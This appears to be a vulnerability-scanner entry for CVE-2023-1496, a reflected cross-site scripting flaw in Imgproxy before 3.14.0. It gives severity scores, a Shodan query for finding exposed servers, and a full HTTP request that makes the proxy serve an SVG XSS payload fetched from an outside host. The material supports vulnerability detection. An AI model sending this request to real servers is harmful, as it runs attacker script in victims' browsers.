| Title | Imgproxy < 3.14.0 - Cross-site Scripting (XSS) |
|---|---|
| Author | pdteam |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. |
| Remediation | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.17247 |
| CVE ID | CVE-2023-1496 |
| CWE ID | CWE-79 |
| Shodan Query | Server: imgproxyserver: imgproxy |
| Tags | cve cve2023 huntr imgproxy xss svg evilmartians vuln |
Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
GET /unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1496.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-1496.pcap
N/AN/A